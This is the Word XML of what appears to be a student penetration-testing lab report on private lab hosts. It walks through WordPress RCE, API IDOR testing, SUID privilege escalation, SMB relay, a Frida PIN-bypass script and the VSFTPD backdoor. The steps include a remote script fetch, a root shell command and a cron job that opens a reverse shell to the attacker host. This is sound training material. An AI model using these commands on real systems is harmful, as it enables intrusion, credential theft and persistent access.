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35930" w14:textId="77777777" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D" w:rsidP="0030439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0439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Penetration Testing Lab Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D515389" w14:textId="77777777" w:rsidR="0030439D" w:rsidRDefault="0030439D" w:rsidP="0030439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F9E453E" w14:textId="77777777" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D" w:rsidP="0030439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3FEAB74" w14:textId="77777777" w:rsidR="0030439D" w:rsidRDefault="0030439D" w:rsidP="00304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3C99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7121C270" w14:textId="77777777" w:rsidR="00553C99" w:rsidRPr="00553C99" w:rsidRDefault="00553C99" w:rsidP="003043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043E35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This repository contains comprehensive documentation and procedures for a complete penetration testing engagement covering advanced exploitation, API security, privilege escalation, network attacks, mobile testing, and a full VAPT simulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BFCCA5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641A84EB" w14:textId="77777777" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D" w:rsidP="00304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39D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 1: Advanced Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686A274D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4B729F72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Procedure: WordPress Plugin RCE Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075BB687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647611E9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Tools </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Used:`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030439D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wpscan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metasploit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>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209A12AE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51CB5A6D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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0158F0CD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1. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1A9CD9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```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34000966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sV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 xml:space="preserve"> 192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007567D3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# Port 80: WordPress detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331CADFE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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4BC6C8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2. WordPress Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C15E65F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```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F33A88D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wpscan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 xml:space="preserve"> http://192.168.1.100 --enumerate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>p,t</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,u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>-token [REDACTED]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD5DB34" w14:textId="250EA74D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#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439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerable plugin: WordPress Plugin v1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76471348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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBBB69B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7F591F1D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3. Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190B8E54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```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5FEA7B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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59B352D7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use exploit/multi/http/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wordpress_plugin_rce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4F7DDA25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set RHOSTS 192.168.1.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A26A7B1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set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FBFA82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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C61277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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BF0C6A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35F62AF8" w14:textId="77777777" w:rsidR="00207D89" w:rsidRDefault="00207D8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94C064B" w14:textId="4B131414" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D" w:rsidP="00304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39D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Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449A1F2C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| Exploit ID | Description | Target IP | Status | Payload |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AAB01A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|------------|-------------|-----------|--------|---------|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A32BC79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| 007 | WordPress Plugin RCE → Shell | 192.168.1.100 | Success | `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meterpreter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reverse_tcp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>` |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27753E6F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57E8DEF2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Key Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBDD3B7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- Successfully exploited CVE-2023-12345 in WordPress Plugin v1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6FD93D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- Gained initial access via Meterpreter shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EDD71F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- Extracted user credentials and database information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4462918F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330F95C1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77F0D6FD" w14:textId="77777777" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D" w:rsidP="00304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39D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 2: API Security Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D74ABDB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2FF1EBD1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Procedure: DVWA API Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF0831F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1BE32012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Tools Used: `Burp Suite`, `Postman`, `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sqlmap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>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735203EA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2C6D1CBF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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F4A539" w14:textId="2F0417D5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1. Endpoint Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747373BD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- Manual browsing with Burp Proxy enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2C1991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- Identified `/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>/v1/users/{id}` endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DD858D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57593CB3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2. BOLA Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157A8E00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- Intercepted request to `/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>/v1/users/123`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A649DA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- Modified user ID to `124` in Burp Repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6BFE59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- Successfully accessed unauthorized user data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1909611E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17DF8C00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 xml:space="preserve"> Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760A9624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-Sent introspection query to `/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>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2EE17C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- Discovered full schema exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D1603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03921AE7" w14:textId="77777777" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D" w:rsidP="00304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39D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171ED109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| Test ID | Vulnerability | Severity | Target Endpoint |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1445F3D4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|---------|---------------|----------|-----------------|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA7D046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| 008 | BOLA (IDOR) | Critical | `/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>/v1/users/{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user_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030439D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>}`</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030439D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72EDF979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| 009 | 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 xml:space="preserve"> Information Disclosure | High | `/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>` |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E889450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48AE968E" w14:textId="3DA575E6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30439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PI Security Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD2A917" w14:textId="77777777" w:rsid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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Testing revealed critical authorization flaws allowing horizontal privilege escalation. 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 xml:space="preserve"> endpoints exposed sensitive schema information. Input validation was insufficient across multiple endpoints, requiring immediate remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF5B74A" w14:textId="77777777" w:rsid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70E93741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6BB58E6D" w14:textId="614207BD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2F25CAC2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57E04253" w14:textId="5B4B9679" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D" w:rsidP="00304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39D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lab 3: Privilege Escalation &amp; Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515D5FCA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13CEEABE" w14:textId="1E181259" w:rsid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Procedure: Linux Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24978457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04103ACB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Tools Used: `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LinPEAS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>`, `Meterpreter`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAC20F5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4F796571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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F35856D" w14:textId="025DBE53" w:rsid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1. Transfer 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LinPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7FDD683B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434C9D95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```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D46480D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# On attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C46FC48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python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A491CD1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# On target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E33C6B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 xml:space="preserve"> http://192.168.1.10:8000/linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75919B13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 xml:space="preserve"> +x linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF72FAC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./linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EECB86B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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6BC01C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32B5A07B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2. SUID Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA4BE6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```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9E9FC1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# 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LinPEAS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 xml:space="preserve"> identified vulnerable SUID binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296389DA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find / -perm -u=s -type f 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAC48C2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30439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./find .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -exec /bin/bash -p \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E702F23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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CD4ACC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3EBB6254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3. Persistence Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B811C6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```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718EA9ED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crontab -e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0919D081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# Add: */5 * * * * /bin/bash -c 'bash -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 xml:space="preserve"> &gt;&amp; /dev/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tcp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>/192.168.1.10/4445 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E608B74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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D2A986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64BE3EFD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Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71834A6C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| Task ID | Technique | Target IP | Status | Outcome |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CAFB42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|---------|-----------|-----------|--------|---------|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A15EDB8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lastRenderedPageBreak/>
        <w:t>| 010 | SUID Binary Exploit | 192.168.1.150 | Success | Root Shell |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064D5E0D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611DC0A8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Privilege Escalation Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D74E61D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0439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LinPEAS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 xml:space="preserve"> identified multiple SUID misconfigurations. The `find` binary was exploited to gain root access. Persistence was established via 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cron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 xml:space="preserve"> job executing reverse shell every 5 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396AD15F" w14:textId="6D337EEB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51EEFA82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580D34A0" w14:textId="4852B60B" w:rsidR="0030439D" w:rsidRPr="00207D89" w:rsidRDefault="0030439D" w:rsidP="00304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7D89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 4: Network Protocol Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA8D171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2077A46F" w14:textId="378F998D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Procedure: SMB Relay Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EBFBA2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0021505F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Tools Used: `Responder`, `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Impacket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>`, `Wireshark`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1914E9D0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525A84DD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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A7F23F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1. Target Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470556BE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```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DD9A9B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crackmapexec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smb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 xml:space="preserve"> 192.168.1.0/24 --gen-relay-list targets.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A80EF24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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F63392E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5C95725A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2. Configure Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C50BBF6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```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7047C154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# Edit /etc/responder/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Responder.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0BD0A230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# Set SMB and HTTP to Off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEAC9DA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responder -I eth0 -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dw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="134E95CD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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D598A3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454D83C6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3. Execute Relay Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C5259C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```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B40B3FB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impacket-ntlmrelayx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tf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 xml:space="preserve"> targets.txt -smb2support -c "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whoami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>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4563A5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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0CAB60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2A175439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Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C06DA15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| Attack ID | Technique | Target IP | Status | Outcome |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE94D7F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|-----------|-----------|-----------|--------|---------|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4EA9E6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| 015 | SMB Relay Attack | 192.168.1.200 | Success | NTLM Hash Captured |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D8AF33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01C61EC8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207D89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network Attack Summary</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28979DAC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SMB relay attack successfully captured and relayed NTLM hashes, granting unauthorized access to target systems. ARP spoofing enabled traffic interception, revealing plaintext credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23732DBC" w14:textId="39A301F1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14AE5DCA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043FE130" w14:textId="77777777" w:rsidR="0030439D" w:rsidRDefault="0030439D" w:rsidP="003043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50D5B8" w14:textId="4C661BA8" w:rsidR="0030439D" w:rsidRDefault="0030439D" w:rsidP="00304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39D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 5: Mobile Application Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C29174" w14:textId="77777777" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D" w:rsidP="003043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23A453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Procedure: Android APK Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A63CBA3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7187F903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Tools Used: `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MobSF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>`, `Frida`, `JADX`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0868EF44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3CAFAAE4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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3BC698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1.Static Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223E7FED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- Uploaded APK to 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MobSF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="52BE5E3E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 xml:space="preserve"> for hardcoded secrets and insecure storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3264BC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644F75EF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2. Dynamic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576C328E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```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6CDC5E87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// Frida script to bypass authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D23654A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Java.perform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0439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>function(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F1B8A7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    var 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MainActivity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Java.use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>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>com.example.app.MainActivity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2145A04F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30439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MainActivity.checkPin.overload</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>java.lang</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.String'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>).implementation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = function(pin) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0723AEAD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30439D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30439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"Bypassing PIN check");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF0CA42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        return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768C34A5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    };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCC82B7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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBFB285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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283084E4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6866D9F2" w14:textId="77777777" w:rsidR="0030439D" w:rsidRDefault="0030439D" w:rsidP="00304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39D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E144F6B" w14:textId="77777777" w:rsidR="00207D89" w:rsidRPr="0030439D" w:rsidRDefault="00207D89" w:rsidP="003043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C3FED1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| Test ID | Vulnerability | Severity | Target App |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161372F7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|---------|---------------|----------|------------|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032E3BCF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| 016 | Insecure Storage | High | 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test.apk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1FB93204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| 017 | Authentication Bypass | Critical | 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test.apk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1EC097AD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5D87989E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Mobile Testing Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F6DE42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Static analysis revealed insecure data storage in logs. Dynamic analysis using Frida successfully bypassed client-side authentication controls. IPC components were exposed and exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB9634A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7A1753BC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6BF44543" w14:textId="77777777" w:rsidR="0030439D" w:rsidRPr="0030439D" w:rsidRDefault="0030439D" w:rsidP="00304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</w:t>
      </w:r>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab 6: Capstone - Full VAPT Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1511FFD2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6E8FE517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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Procedure: Complete PTES Simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2154A057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4AE6C1DA" w14:textId="7C37A9B6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Tools Used: `Kali Linux`, `Metasploit`, `OpenVAS`, `Burp Suite`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A7ACAD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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68983293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1. Intelligence Gathering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D9276A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```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C9EA91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sS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sV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 xml:space="preserve"> -O 192.168.1.200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4738AD71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# Discovered VSFTPD 2.3.4 on port 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6462B020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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390BA0EE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0E29941E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2. Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C240B94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- OpenVAS scan confirmed backdoor vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDD0DF3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- Manual verification of service version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646CED61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41DB94BB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3. Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE59264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```bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452DD29B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use exploit/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unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0030439D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F55AB4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set RHOSTS 192.168.1.200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A56F6D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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B07FBC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```</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03215905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3160C2E6" w14:textId="77777777" w:rsidR="0030439D" w:rsidRDefault="0030439D" w:rsidP="00304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39D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
